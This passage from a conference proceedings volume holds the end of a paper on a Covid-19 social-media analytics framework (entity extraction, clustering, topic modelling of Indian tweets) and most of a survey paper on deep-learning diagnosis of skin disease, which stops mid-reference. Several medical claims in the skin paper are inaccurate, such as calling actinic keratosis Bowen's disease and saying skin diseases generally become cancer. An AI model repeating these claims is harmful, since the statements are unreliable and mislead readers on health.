and mentions if available from the previous pre-processing step help to accurately
determine the user location and people who he may have come in contact with. The
government healthcare bodies can use this technique for effective contact tracing
which has proved to be a successful measure worldwide to contain the spread of the
pandemic. World witnessed the Covid-19 pandemic for the first time, and hence it
was seen during the initial days of pandemic that new symptoms of Covid-19 were
being updated in WHO list.2 The automated techniques like the one proposed in our
framework can discover the possibly associated new symptoms and heath indicators
related to a pandemic by aggregation and statistical analysis of verb phrases from the

2 https://www.who.int/emergencies/diseases/novel-coronavirus-2019/advice-for-public.
442 R. Jindal and A. Malhotra

Covid-19 related user generated content on social media. The verb phrases extracted
are action verbs and also denote the state of being. These can be retrieved from
users’ posts as it was seen users were writing about their health condition due to
the anxiety, uncertainty and paranoia related to Covid-19 in the initial months. Now
also, as the world is commencing the vaccination phase, it can assist the government
bodies to discover health indicators which the users are posting about to timely know
the adverse effects of the vaccinations which have been developed in an expedited
record time.
Entity Recognition: We use the popular NLP and AI based automated informa-
tion extraction technique called Named Entity Recognition (NER) to further augment
the information retrieved from users’ unstructured textual posts. NER is the task of
locating and identifying named atomic elements or entities from unstructured text,
and classifying them into predefined categories such as: people names, locations,
organization and company names, date and time objects, quantifying measures, cur-
rencies, artefacts etc. As per English dictionary: an entity is defined as a thing or
a concept with distinct characteristics and independent existence. Unlike POS tag-
ging which assigns part of speech tags to each word token, NER is able to extract
entities which may be a single word or word phrases (chunks) referring to the same
concept, thereby giving more meaningful learning and generating valuable insights
from large volumes of unstructured text. Machine learning models need to be trained
with relevant language literature to make them learn the different entity categories
and granular rules so that they are able to locate and identify the relevant entities
from unstructured text. In case of basic applications, one may even use a lexicon or
rule based NER system. However, in our niche and specialized use case, we would
need ML based trained models to build a generalized and scalable NER system that
works efficiently in a real time global application.
Information Aggregation: We have proposed a decision support framework for
effective governance related decision making during the pandemics using the unstruc-
tured data from users’ social media posts. An essential and desirable characteristic
of such an application are to be able to work in real time and process data streams
on 24*7 continuous basis. In order to handle the volume and velocity of the incom-
ing unstructured data stream in real time and for efficient processing, it is essential
to aggregate and categorize the information into meaningful buckets with logically
related and similar data. For this purpose, we implement unsupervised machine
learning algorithms: K -Means clustering and hierarchical agglomerative clustering
to group and aggregate the semantically related and similar information extracted
above. We group and cluster the similar noun and verb phrases and entities collected
above for quick consumption and comprehension by government officials from vari-
ous nationalized bodies working for pandemic management and containment. These
clusters of valuable information pieces can be presented to them via a dashboard or
a key word based search tool.
Efficacious Governance During Pandemics … 443

3.3 Social and Economic Trend Prediction Module

In the era of Web 3.0, social media platforms have become the primary medium
of communication for everyone. People post about their day to day activities, vaca-
tions, experiences, feelings, express emotions, opinions, thoughts, ideas etc. span-
ning across the whole gamut of human life. This phenomenon continued during this
unprecedented global crisis situation caused by the pandemic of Covid-19; and on
social media people were talking about a multitude of topics like work from home,
job losses, hunger, deaths, depression, domestic violence, supply chain of FMGC
goods, availability of hospitals and care, vaccination for corona, and what not. The
plethora of topics being talked about on social media has been dynamic and evolved
during the course of the pandemic through various month in 2020. For example, in
India initially people were talking about availability of sanitizers, masks and hospi-
tal care; then about imposed lockdown and the condition of migrant labourers, job
losses and work from home, vaccination development, GDP contraction and sectors
of economy which were impacted the most; users were also discussing about eco-
nomic and social reforms required for recovery in the later months of 2020. Presently,
people are talking about the efficacy and side effects of Covid-19 vaccinations, dif-
ferent vaccines available and their administration etc. These are just few examples.
The topics of conversations on social media varied across the globe from nation to
nation. But the underlying uniform characteristic of these social media conversations
is: they represent the common public concerns and interests, challenges and issues
faced by the common citizens, the impact and acceptability of the measure taken by
the government, and the future social and economic challenges that lie ahead of the
nation’s government to address in the coming years. It is a known fact now that the
world will take 3–5 years to fully recuperate from the social, economic and health-
care impact of Covid-19 pandemic. This is the main motivation behind choosing
social-economic global trend prediction as one of our research goals.
We use Latent Dirichlet Allocation (LDA) and Gibbs Sampling Dirichlet Mixture
Model (GSDMM) algorithm for topic modelling from unstructured user generated
text on social media. Topic modelling is an unsupervised machine learning technique
which builds a statistical topic model from raw unstructured text to discover hidden
and abstract topics, themes and ideas being discussed in them. Topic modelling
is an effective technique to quickly understand and summarize large volumes of
free form text and extract meaningful insights when annotated or labelled data is
not available. We implemented topic modelling in our proposed decision-making
governance framework as it can quickly build comprehension about what common
people are discussing on social media from the Covid-19 related user posts. As we
mentioned before, having this comprehension can help government bodies better
understand the common public concerns and challenges, opinions of citizens, and
discover various social and economic topics.
LDA algorithm [10] builds a statistical model based on the distribution of words
in any given input document by considering each document as a collection of topics;
further where each topic is a collection of semantically related dominant keywords.
444 R. Jindal and A. Malhotra

LDA represents each document as a mixture (probability distribution) of topics and


each topic as a mixture (probability distribution) of words, and tries to infer what
topics would create the probability distribution of words as seen in the documents.
LDA algorithm treats documents as bag of words and is based on matrix factorization
technique; where the aim is to convert the Document-term matrix (N , M) to two
lower dimension matrices: Document-Topic matrix (N , K ) and Topic-Word (K , M)
matrix; K being the input parameter, i.e. the number of top K topics to extract.
After an initial random assignment of topic to documents and words to topic, LDA
optimizes the probability distribution of the lower dimension matrices by improving
the assignments done in the previous steps. It iterates through each document and
its each word to determine: the proportion they contribute to the topic assigned to
the document, and the proportion in which they contribute to the overall topics in
all documents; based on which they are reassigned to new topics. This way, LDA
backtracks to compute the topic-word distribution that would create the topic the
overall document set represents. Hyper parameters alpha and beta control document-
topic and topic-word density; alpha decides the number of topics assigned to each
document and beta controls the number of words used to model a topic. GSDMM is
a variation of LDA proposed by [11] for short text topic modelling; this algorithm
assumes that a document consists of a single topic only instead of a mixture of topics
like in the case of LDA. In our implementation, pre-processed user’s posts are input
documents for the algorithm.

4 Implementation and Results

Building such decision support frameworks require complex interdisciplinary


research by different government and public organizations; and needs skilled profes-
sionals to derive value from insights provided by the system for effective decision
making and governance. Aggregating time variant data from various heterogeneous
sources is another daunting task to build such real world applications. At the same
time, citizen’s privacy and trust should be kept in mind while developing such sys-
tems as they may perceive these technologies to be surveillance systems. Due the
above constraints, we did a prototype implementation of our proposed decision sup-
port framework, to demonstrate as a proof-of-concept of how this framework can
assist in governance and decision making during the pandemic. This is a novel idea
for governance during pandemics, as we could not find a similar framework from the
existing literature survey for a baseline in comparison with our proposed framework.
The dataset used, sample results and other details of implementation are elaborated
in this section.
Efficacious Governance During Pandemics … 445

Various Twitter datasets of Covid-19 related tweets have been collected and made
publicly available for research3,4,5 [12]. We used the tweets from one of these pub-
licly available datasets6 ; this dataset has been collected since early March 2020, i.e.
the time when the onset of the pandemic began. It contains the Tweets by users who
applied various Covid-19 related hashtags, e.g. #coronavirus, #coronavirusoutbreak,
#coronaviruspandemic, #covid19, #ihavecorona etc. Out of this dataset, we selected
tweets in English language for India region, during the period of 29 March 2020 to
30 April 2020. This selected dataset had approximately 42,000 tweets, from various
locations in India as depicted in Fig. 2, along with the date-wise distribution of this
selected dataset Fig. 3.
We used the Cython based Spacy library for implementing our Information Extrac-
tion Module for extracting entities, noun and verb phrases. Spacy is the fastest library
for NLP tasks for building large scale, industrial, real world natural language under-
standing systems and is meant for production scale usage7 ; hence it is the first obvious
choice for implementing our Big Data framework. The most important entities and
nouns extracted from the selected dataset are depicted in Fig. 4.
Next, we used the Gensim python library to implement LDA algorithm for topic
modelling, and pyLDAvis for graphical visualization of topic-word clusters obtained.
For prototype implementation of GSDMM algorithm we referred to GitHub libraries
and tutorials.8,9,10 After multiple experiments, we extracted 17 topics with 317
unique words (i.e. Topic-Word (K,M) matrix of (17,317)), that had minimal overlap
between the topic clusters (ref. Fig. 5; top keywords from 2 sample topic clusters are
also shown in the figure.

5 Discussion and Future Work

As on date, there have been around 2.2 million deaths worldwide and over 100 million
Covid-19 cases.11 Covid-19 is an unforeseen global health emergency that has caused
fear, uncertainty, mental health issues and a lot of pain due to the irreplaceable loss
of loved ones. The collateral damage and impact of pandemic on the society and
economy cannot be accurately gauged and the lasting impact of this pandemic will
only be known in the years to come. Hence it becomes imperative for the government

3 https://www.kaggle.com/smid80/coronavirus-covid19-tweets.
4 https://github.com/ben-aaron188/covid19worry.
5 https://github.com/thepanacealab/covid19_twitter.
6 https://www.kaggle.com/smid80/coronavirus-covid19-tweets.
7 https://spacy.io/.
8 https://towardsdatascience.com/short-text-topic-modelling-70e50a57c883.
9 https://github.com/rwalk/gsdmm.
10 https://github.com/Matyyas/short_text_topic_modeling/blob/master/notebook_sttm_example.

ipynb.
11 https://www.worldometers.info/coronavirus/.
446 R. Jindal and A. Malhotra

Fig. 2 Tweets dataset location and region distribution

Fig. 3 Tweets dataset date-wise distribution


Efficacious Governance During Pandemics … 447

Fig. 4 Sample of entities and nouns extracted

Fig. 5 Visualization of LDA topic clusters formed

and public institutions to monitor real time data, take data driven informed decisions,
and continuously observe their efficacy. Due to the popularity and gigantic user base,
social media platforms are a powerhouse for first hand information from citizens.
From the literature survey done, we did not find an extensive use of publicly available,
real time, social media data feeds for governance during the pandemic of Covid-19.
To address this research gap, we proposed an intelligent decision support framework
for efficacious governance that can immensely assist in data driven decision making
during such global emergency of any kind, presently the Covid-19 pandemic. As a
proof-of-concept, we have successfully demonstrated the prototype implementation
of our proposed framework on sample publicly available Covid-19 Tweet Dataset.
As part of our future research, we plan to enhance this governance framework to
incorporate multi-lingual and multi-modal user generated content, since India itself
has many vernacular languages. Another important module we wish to incorporate
in our governance framework will be for controlling the spread of misinformation
through social media since we all know it leads to unwanted fear, panic and anxiety
among the citizens of the country during such difficult crisis.

References

1. Alamo, T., Reina, D. G., & Millán, P. (2020). Data-driven methods to monitor, model, forecast
and control covid-19 pandemic: Leveraging data science, epidemiology and control theory.
arXiv preprint arXiv:2006.01731.
448 R. Jindal and A. Malhotra

2. Rekha Hanumanthu, S. (2020). Role of intelligent computing in COVID-19 prognosis: A state-


of-the-art review. Chaos Solitons Fractals, 109947.
3. Bullock, J., Pham, K. H., Lam, C. S. N., & Luengo-Oroz, M. (2020). Mapping the landscape
of artificial intelligence applications against COVID-19. arXiv preprint arXiv:2003.11336.
4. Oyebode, O., Ndulue, C., Mulchandani, D., Suruliraj, B., Adib, A., Orji, F. A., ... & Orji, R.
(2020). COVID-19 pandemic: Identifying key issues using social media and natural language
processing. arXiv preprint arXiv:2008.10022.
5. Samuel, J., Ali, G. G., Rahman, M., Esawi, E., & Samuel, Y. (2020). Covid-19 public sentiment
insights and machine learning for tweets classification. Information, 11(6), 314.
6. Aslam, F., Awan, T. M., Syed, J. H., Kashif, A., & Parveen, M. (2020). Sentiments and emotions
evoked by news headlines of coronavirus disease (COVID-19) outbreak. Humanities and Social
Sciences Communications, 7(1), 1–9.
7. Low, D. M., Rumker, L., Talkar, T., Torous, J., Cecchi, G., & Ghosh, S. S. (2020). Natural
language processing reveals vulnerable mental health support groups and heightened health
anxiety on reddit during COVID-19: Observational study. Journal of Medical Internet research,
22(10),
8. Pu, C., Suprem, A., & Lima, R. A. (2020). Challenges and opportunities in rapid epidemic
information propagation with live knowledge aggregation from social media. arXiv preprint
arXiv:2011.05416.
9. Chen, Q., Leaman, R., Allot, A., Luo, L., Wei, C. H., Yan, S., & Lu, Z. (2020). Artificial Intelli-
gence (AI) in action: Addressing the COVID-19 pandemic with Natural Language Processing
(NLP). arXiv preprint arXiv:2010.16413.
10. Blei, D. M., Ng, A. Y., & Jordan, M. I. (2003). Latent dirichlet allocation. Journal of Machine
Learning research, 3(1), 993–1022.
11. Yin, J., & Wang, J. (2014). A dirichlet multinomial mixture model-based approach for short text
clustering. In Proceedings of the 20th ACM SIGKDD International Conference on Knowledge
Discovery and Data Mining (pp. 233-242).
12. Banda, J. M., Tekumalla, R., Wang, G., Yu, J., Liu, T., Ding, Y., & Chowell, G. (2020). A
large-scale COVID-19 Twitter chatter dataset for open scientific research–an international
collaboration. arXiv preprint arXiv:2004.03688.
Skin Disease Diagnosis: Challenges
and Opportunities

Vatsala Anand, Sheifali Gupta, and Deepika Koundal

Abstract The skin acts as a protection barrier against environmental danger and
foreign substances. Every year, thousands and millions of people are affected by skin
disorders that may cause skin cancer at later stage. The problem of skin disorders and
skin cancer is spreading fast due to exposure to sunlight, pollutants, chemicals like
nitrates, arsenic, and ultraviolet rays. This is an alarming disease, so it is necessary for
everyone to pay attention toward this. An automatic recognition of skin disease from
dermoscopic images is a big challenge due to the low contrast, a huge inter/intra-class
variation, and high visual similarity among the different skin lesions. With the explo-
sion of advanced information and recognition model, primarily the Deep Learning
(DL) and Transfer Learning (TL) models, all aspects of recent research have been
influenced. In this paper, a brief discussion is done about the skin disease and the work
that is already done using Machine Learning (ML) and Deep Learning (DL) models.
A system will be developed in future for early diagnosis of skin disease in which
the features of the dermoscopy images will be extracted using Convolutional Neural
Network (CNN). So, the system will be efficient in focusing on the right features of
the image and help in enhancing the accuracy by minimizing the amount of errors
in interpretation of image. It can provide more confident diagnosis to dermatologists
and can assist the doctors as a second opinion in providing accurate decisions.

Keywords Diagnosis · Machine learning · Deep learning · Dermoscopy · Skin ·


Convolutional neural network · Classification

V. Anand (B) · S. Gupta


Chitkara University Institute of Engineering and Technology, Chitkara University, Chandigarh,
Punjab, India
e-mail: vatsala.anand@chitkara.edu.in
S. Gupta
e-mail: sheifali.gupta@chitkara.edu.in
D. Koundal
Department of Virtualization, School of Computer Science, University of Petroleum and Energy
Studies, Dehradun, India
e-mail: dkoundal@ddn.upes.ac.in

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 449
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_36
450 V. Anand et al.

1 Introduction

The skin is an outer covering which separates environment and body of human beings.
Skin is made of flexible outer tissue. It shows three main functions: protection, regu-
lation, and sensation. It regulates temperature of body and stores water, vitamin D,
and fat. The two main layers of skin are dermis and epidermis. Epidermis is outer-
most layer, separated from the dermis. Like dermis, the epidermis layer is not thick.
It does not contain blood vessels [1]. Melanocytes are located in the bottom layer of
the skin’s epidermis. Melanocytes are melanin-producing neural crest-derived cells,
whereas dermis is a connective tissue which is composed of two layers, deeper layer
is reticular layer, and the outer layer is superficial papillary layer, and hypodermis
consists of loose connective tissue with collagen and elastin fibers.

1.1 Skin Disease

Skin disease includes skin infections which caused by exposure to sun where irregular
cells develop in the epidermis layer that is the outer layer of the skin. It is characterized
by dark wart like patches in the body which can be benign or malignant. Sometimes,
normal abnormalities of skin are also known as skin disease like birthmarks. The
various kinds of skin disease are discussed as follows:
(i) Actinic Keratoses (AKIEC): It is also known as a solar keratosis or Bowen’s
disease. It is a type of sun damage due to exposure to sun light in which the
abnormal cells develop in the topmost layer of the skin. It looks like a scaly
patch or rough skin as shown in Fig. 1. A small percentage of actinic keratosis
in the end can become skin cancer. It can be reduced by protecting skin from
ultraviolet (UV) rays [2].
(ii) Benign Keratosis or Seborrheic Keratosis (BKL): It is a non-cancerous
growth of skin. Older people has more of BKL. It is usually black, light
tan, or brown. The growths look slightly raised as shown in Fig. 2. They are
harmless and not contagious. The treatment is not required for this. On the
other hand, they can be removed if a person does not like how they look [4].
(iii) Dermatofibromas (DF): These are the growths small in size and are harmless
in nature which appears on the skin. These can grow on any part on the body,

Fig. 1 Dataset example taken from: Actinic Keratoses [3]


Skin Disease Diagnosis: Challenges and Opportunities 451

Fig. 2 Dataset example taken from: Benign Keratosis [3]

Fig. 3 Dataset example taken from: Dermatofibromas [3]

but these are commonly seen on the lower legs, upper back, and arms as shown
in Fig. 3. These can be seen in adults but are very rare in children [5].
(iv) Melanocytic Nevi (NV): Melanocytic nevi or melanocytic nevus can be seen
on the body of almost all individuals as shown in Fig. 4. Some people have
few, while others have hundreds of melanocytic nevus on body [6].
(v) Vascular Lesions (VASC): Common abnormalities, more commonly known
as birthmarks as shown in Fig. 5.
(vi) Skin Cancer: Skin cancer is a type of cancer which develops on skin when
exposed to sunlight. Exposure to ultraviolet light or ionizing radiations can
also cause skin cancer. This problem is worse in high elevation areas or the

Fig. 4 Dataset example taken from: Melanocytic nevi [3]

Fig. 5 Dataset example taken from: Vascular lesions [3]


452 V. Anand et al.

Fig. 6 Dermoscopy image


of a melanoma [3],
b non-melanoma [7]

areas near equator where sunlight exposure is more intense. Infection from
medications such as chemotherapy can also cause skin cancer. People having
fair-skinned and fair-haired due to insufficient skin pigmentation are prone to
skin cancer. Also, exposure to pollutants of chemical (nitrates, arsenic, tar,
coal, oils, and paraffins) scars from severe burns can cause skin cancer. Skin
cancer falls into two major categories called non-melanoma and melanoma.
a. Melanoma (MEL): It affects melanocytes cells which exist in the lowest
epidermis layer. It tends to spread to other parts of the body, and it is malignant
in nature. It occurs in small and significant numbers. This is fatal if it is not
treated early. Sometimes existing mole that itches, bleeds, and changes shape
or color refers to melanoma cancer. It appears like small black spot or as larger
brownish patch with white or red speckles. Also, it can spread easily. It is linked
with melanocytes of epidermal layer. There is less curable rate for melanoma.
Figure 6 shows the dermoscopy image of melanoma and non-melanoma.
b. Non-Melanoma: It does not affect melanocytes. It is unlikely to spread to
other parts of the body. This cancer may be locally disfiguring if it is not
treated early. They progress slowly, spread beyond the skin and can be detected
easily and are usually curable. Figure 6b shows the dermoscopy image of
non-melanoma. The commonly occurring cancer is non-melanoma with more
than 4.3 million cases of basal cell carcinoma and over 1 million cases of
squamous cell carcinoma [7]. The broader category of non-melanoma skin
cancer includes basal cell carcinoma (BCC) and squamous cell carcinoma
(SCC).
• Basal Cell Carcinoma (BCC): It is widely recognized disease in people. The
main symptoms of BCC include a reddish bluish or brown black patch of skin.
It rises from basal layer of epidermis. It begins as a waxy nodule small in size
with pearly borders. BCC is categorized by erosion and invasion of adjoining
tissues. It rarely metastasizes, but its reappearance is common.
• Squamous Cell Carcinoma (SCC): It appears like scaly patch or like firm
reddish bump that grows gradually. It can be treated without difficulty if
primary detection is possible but it is most likely to spread as compared to
BCC. It is mostly seen in Black and Asian Indians. Figure 7b shows the image
of squamous cell carcinoma.
Early diagnosis of skin cancer includes removal and microscopic examination of
the cells. Among 30–50% of cancers can currently be prevented by avoiding risk
Skin Disease Diagnosis: Challenges and Opportunities 453

Fig. 7 Dermoscopy image


of a BCC [3], b SCC [8]

factors. The cancer burden can also be reduced through early detection of cancer and
management of patients who develop cancer [9].

1.2 Skin Disease Diagnosis

Nowadays, there is a need to educate people about consequences of skin disease.


Firstly, awareness of skin disease is important. Also the program can be designed
to reduce the delays and barriers so that the treatment of patients can be done in
timely manner. It is important to prevent skin disease; otherwise, it will become a
skin cancer. The different measures to be taken to prevent skin disease are applying
sunscreen lotion whenever exposed to sunlight and staying out of the sun during
hot days. One can also prevent from direct exposure to sun by wearing protective
clothes. Dermatologists often use eyes for examining different features of skin such
as color, shape, and texture for diagnosing the lesion as benign or malignant tumor
[10]. The modality used for classification and diagnosis of skin disease is dermoscopy
images. The examination of skin disease with a device called dermatoscope is called
dermoscopy [11] as shown in Fig. 8 which consists of an illumination system with
high-quality magnifying lens. The dermoscopic images are becoming very popular
as there are many large publicly available dermoscopic datasets.

Fig. 8 Dermatoscope device


for skin diagnosis [11]
454 V. Anand et al.

1.3 Publicly Available Dataset for Skin Disease

Database is an important part of any image classification system. The collection of


adequate amount of data to form a dataset is critical for any image classification
system based on the method of deep learning. The construction of such appropriate
dataset requires large amount of time, expertise in the required domain so as to
select the relevant information, and also infrastructure for capturing the data and
transforming it to a system. So, the collection of data is not an easy task. Generally,
a standard dataset existing in the research area which is enough for the domain of
the problem is utilized. An advantage of using existing dataset is that it enables a
fair comparison between different system designs. Table 1 shows the popular skin
disease dataset that is publicly available.
Rest of the paper is structured as follows. Section 2 consists of the literature
review, followed by justification of research in Sect. 3, followed by research gaps
and problem statement in Sects. 4 and 5. Section 6 contains conclusion.

2 Literature Review

The presence of skin disease can be identified by seeing the irregular edges, changed
color or sometimes patch on skin. Different researchers had designed different tech-
niques for diagnosis of skin disease using architectures of machine learning and deep
learning. The relevant literature in this domain presenting the work done by different
researchers is studied. Each researcher has tried to design a different model and
has obtained different level of accuracy in predicting this. Machine learning basi-
cally teaches computers to perform tasks that human can naturally perform. Machine
learning is less accurate to work with large amount of dataset for prediction purposes
[17, 18]. Garnavi et al. [19] had presented a clustering-based histogram thresholding
algorithm for segmentation. By using the algorithm, morphological operators are
utilized to obtain the segmented lesion. The algorithm was tested on 30 high reso-
lution dermoscopy images. It had achieved an accuracy of 97%. Fassihi et al. [20]
had shown segmentation by using morphologic operators and feature extraction by
using wavelet transform. In the pre-processing part, mean filter was used for noise
removal. It had achieved an accuracy of 90%. The dataset consists of 91 images taken
from hospitals and websites. Smaoui et al. [21] had done pre-processing followed by
segmentation process in which region growing was used. After that feature extraction
was done followed by ABCD rule. A set of 40 dermoscopic images was used. It had
achieved an accuracy of 92%, sensitivity of 88.88%, and specificity of 92.3%. Deep
learning (DL) learns different features directly from the given data. Deep learning
techniques are capable of handling data with high dimensionality and give better
performance. It is efficient in focusing on the right features of the image on its own.
Therefore, deep learning proves to be more efficient in comparison with machine
learning techniques as deep learning techniques can work with large databases and
Skin Disease Diagnosis: Challenges and Opportunities 455

Table 1 Publicly available skin disease dataset


Name of dataset No. of classes Name of Images of each Image size Total images
classes class
HAM10000 [3] 7 AKIEC 327 600 × 450 10,015
BKL 1099
NV 6705
BCC 514
VASC 142
MEL 1113
DF 115
Interactive Atlas 2 BCC – 768 × 512 1000
of Dermoscopy MEL –
[12]
Dermofit Image 10 AKIEC 45 – 1300
Library [13] BKL 257
NV 331
BCC 239
Intraepithelial 78
carcinoma
MEL 76
DF 65
Haemangioma 97
Pyogenic 24
granuloma
SCC 88
PH2 [14] 3 Melanocytic 160 768 × 560 200
nevi
MEL 40
Kaggle [15] 2 Benign 1800 224 × 224 3297
Malignant 1497
ISIC Archive 4 Melanoma – – 4029
[16] Non-melanoma –
(ISIC-2016)
(ISIC-2017) NV –
BKL –

with more accuracy. From the last years, improvements in deep learning convolu-
tional neural networks (CNN) have shown favorable results and also became a chal-
lenging research domain for classification in medical image processing [22]. Zafar
et al. [23] proposed a method by combining two architectures the U-Net and the
ResNet, collectively called Res-Unet. The dataset used was taken from PH2 dataset
with 200 dermoscopic images and ISIC-17 test data consisting of 600 images. On
456 V. Anand et al.

ISIC-17 dataset, the value of Jaccard index was 77.2%, and dice coefficient was
0.858, whereas on PH2 dataset, the value of Jaccard index was 85.4%, and dice coef-
ficient was 0.924. Amin et al. [24] performed pre-processing to resize the images
and used otsu algorithm to segment the skin lesion. The publicly available datasets
(PH2, ISBI 2016- 2017) were merged to form a single large dataset for the validation
of proposed method. The obtained results show sensitivity as 99.52%, specificity as
98.41%, positive predictive value as 98.59%, false negative rate as 0.0158, and accu-
racy as 99.00%. Mahbod et al. [25] investigated image down sampling and cropping
of skin lesion and a three-level fusion approach. A total of 12,927 dermoscopic skin
lesion images were used which were extracted from ISIC archive and HAM10000
dataset. It had achieved an accuracy of 86.2%. There are some limitations in this
work. The biggest limitation of the fusion approach is the large number of utilized
sub-models that consequently need significant training time.

3 Justification of Research

People are not considering skin disease in a serious way. So, nowadays, skin disease
is the cause of deaths worldwide. To prevent this, it is necessary to diagnose the
disease at early stages. Skin disease is one of the major causes of deaths in the US
and worldwide. The occurrence of this has been increasing in human’s day by day.
It is important to prevent skin disease; otherwise, it will become a skin cancer. It is
estimated that 196,060 new cases of melanoma, 95,710 non-invasive (in situ) and
100,350 invasive, will be diagnosed in the US in 2020. Invasive melanoma is projected
to be the fifth most common cancer for men (60,190 cases) and sixth most common
cancer for women (40,160 cases) in 2020 [26]. In 2020, it is estimated that 6,850
deaths will be attributed to melanoma 4610 men and 2240 women. Due to the lesser
number of trained dermatologists in the world, there is a difficulty in precise diagnosis
of skin disease in dermoscopy images. AI-enabled image analysis technique like deep
learning helps in getting the clear picture of disease in the image. Deep learning-
based systems can be employed to improve the performance of disease diagnosis in
the field of medical science by minimizing the amount of errors in interpretation of
image and enhancing the accuracy.

4 Research Gaps

Based on the literature survey conducted in the research area, the research gaps
identified are a large dataset is needed to reduce overfitting problem and for better
accuracy and generalization of the model. Fuzzy borders, noise, low brightness, skin
hair and bubbles, color variation are the issues varies from image to image. This will
always be the greater challenge to segregate the affected area present in dermoscopic
images. A number of skin lesions can mimic skin disease, which could result in
Skin Disease Diagnosis: Challenges and Opportunities 457

misdiagnosis due to inter-class similarities. For example, in dermoscopic images,


benign keratosis can mimic skin disease including BCC, SCC, and melanoma. On
the contrary, a number of skin lesions have intra-class dissimilarities in terms of color,
attribute, texture, size which could result in misdiagnosis. But certain melanomas
are found to be of normal skin color, reddish, and pinkish. There is a need to develop
a model which can accurately predict skin disease in dermoscopic images. A model
with such an approach can aid in early diagnosis of skin disease and can assist doctors
in taking crucial decisions regarding medication and help save lives of people.

5 Problem Statement

Occurrence of skin disease is increasing; therefore, timely diagnosis is necessary


for its treatment. The proper diagnosis and medication are important to prevent any
life threat caused by the disease. DL-based systems can be employed to improve the
performance of disease diagnosis in the field of medical science by minimizing the
amount of errors in interpretation of image and enhancing the accuracy. The proposed
objectives for research work are to pre-process the skin disease dataset for training
of DL-based neural network model and to propose a model for accurate detection
of skin disease in dermoscopy images. To attain the mentioned objectives, in the
data pre-processing stage, normalization and data augmentation are implemented
for better training purpose as shown in Fig. 9. Normalization of data is used to
keep numerical stability in the CNN architectures. With the help of normalization,
a CNN model is expected to learn faster. In deep learning, large amount of data
is required to acquire better accuracy. Moreover, it is very hard and difficult to

Fig. 9 Proposed methodology


458 V. Anand et al.

collect the medical images. To resolve the issue, data augmentation technique can
be used to increase the number of images. The data augmentation on images is
done using different transformation techniques like flipping the image horizontally
and vertically. Also, other augmentation techniques such as rotation, brightness and
zooming can also be applied on the original image to increase the dataset size. After
that a CNN-based model will be proposed for accurate detection of skin disease
in dermoscopy images. Then, comparison will be done using different metrics like
precision, accuracy, specificity, sensitivity, f1 score and will validate the performance
with other state-of-art models.

6 Conclusion

Skin disease cases are increasing day by day. Therefore, early diagnosis of skin
disease is important; otherwise, it will become skin cancer. So it is necessary for
everyone to pay attention toward this. Therefore, the proper and early diagnosis of
skin disease is important to prevent any life threat caused by it. So, a deep learning-
based system will be developed in future for early diagnosis of skin disease in which
the features of the images will be extracted using convolutional neural network. So, it
will be efficient in focusing on the right features of the image and helps in enhancing
the accuracy by minimizing the amount of errors in interpretation of image. A model
with such an approach can assist the doctors in taking crucial decision and can help
to save life. Therefore, the proposed model design can aid in early diagnosis of skin
disease. It can provide more confident diagnosis to dermatologists and can assist the
doctors as a second opinion in providing accurate decisions.

References

1. Seeley, R., Stephens, D., & Philip, T. (2008). In Anatomy and physiology (pp. 1–1266).
McGraw-Hill.
2. Nouveau, S., & Braun, R. (2018). Solar lentigines-dermoscopedia. [Online Accessed August
19 2020].
3. Tschandl, P., Rosendahl, C., & Kittler, H. (2018). The HAM10000 dataset a large collection of
multi-source dermatoscopic images of common pigmented skin lesions. Scientific Data, 14(5).
4. Oakley, A. (2018). DermNet NZ Seborrhoeic Keratosis. [Online Accessed August 19 2020].
5. Pedro, Z. (2018). Dermatofibromas-dermoscopedia. [Online Accessed August 19 2020].
6. Braun, R. (2018). Benign melanocytic lesions-dermoscopedia. [Online Accessed August 19
2020].
7. Rogers, H. W., Weinstock, M. A., Feldman, S. R., & Coldiron, B. M. (2012). Incidence esti-
mate of non-melanoma skin cancer (keratinocyte carcinomas) in the US population. JAMA
dermatology, 151(10), 1081–1086.
8. Treatment Guides .(2007). “Squamous Cell Carcinoma—Treatment”. Retrieved on December
21, 2007 from https://www.skintherapyletter.com/skin-cancer/squamous-cell-carcinoma/.
9. World Health Organization. “Cancer Prevention”, Retrieved from https://www.who.int/cancer/
prevention/en/.
Skin Disease Diagnosis: Challenges and Opportunities 459

10. Bray, F., Ferlay, J., Soerjomataram, I., Siegel, R. L., Torre, L. A., & Jemal, A. (2018). Global
cancer statistics 2018: GLOBOCAN estimates of incidence and mortality worldwide for 36
cancers in 185 Countries. CA: A Cancer Journal for Clinicians, 68(6), 394–424.
11. https://www.medgadget.com/2011/01/handyscope_turns_iphone_into_professional_dermat
oscope.html.
12. Argenziano, G., Soyer, H. P., Giorgi, V. D., Piccolo, D., Carli, P., & Wolf, I. H. (2000) Interactive
Atlas of Dermoscopy-EDRA Medical Publishing & New Media.
13. Dermofit Image Library. https://homepages.inf.ed.ac.uk/rbf/DERMOFIT/datasets.htm.
14. Mendonça, T., Ferreira, P. M., Marques, J. S., Marcal, A. R., & Rozeira, J. (2013). PH 2-A
dermoscopic image database for research and benchmarking. In 2013 35th Annual International
Conference of the IEEE Engineering in Medicine and Biology Society (EMBC) (pp. 5437–
5440).
15. Kaggle Dataset https://www.kaggle.com/fanconic/skin-cancer-malignant-vs-benign.
16. https://www.isic-archive.com/#!/topWithHeader/wideContentTop/main.
17. Alzubi, J. A., Kumar, A., Alzubi, O. A., Manikandan, R. (2019). Efficient approaches for
prediction of brain tumor using machine learning techniques. Indian Journal of Public Health
Research and Development.
18. Alweshah, Alzubi, O. A., Alzubi, J. A., Mohammed, S. A. (2016). Solving attribute reduction
problem using wrapper genetic programming. International Journal of Computer Science and
Network Security.
19. Garnavi, R., Aldeen, M., Celebi, M. E., Bhuiyan, A., Dolianitis, C., & Varigos, G. (2010).
Automatic segmentation of dermoscopy images using histogram thresholding on optimal color
channels. International Journal of Medicine and Medical Sciences, 1(2), 126–134.
20. Fassihi, N., Shanbehzadeh, J., Sarrafzadeh, H., & Ghasemi, E. (2011) Melanoma diagnosis by
the use of wavelet analysis based on morphological operators. In International Multi Conference
of Engineers and Computer Scientists.
21. Smaoui, N., & Bessassi, S. (2013). A developed system for melanoma diagnosis. International
Journal of Computer Vision and Signal Processing, 3(1).
22. Tiwari, P., Qian, J., Li, Q., Wang, B., Gupta*, D., Khanna, A., Rodrigues, J., & Albuquerque,
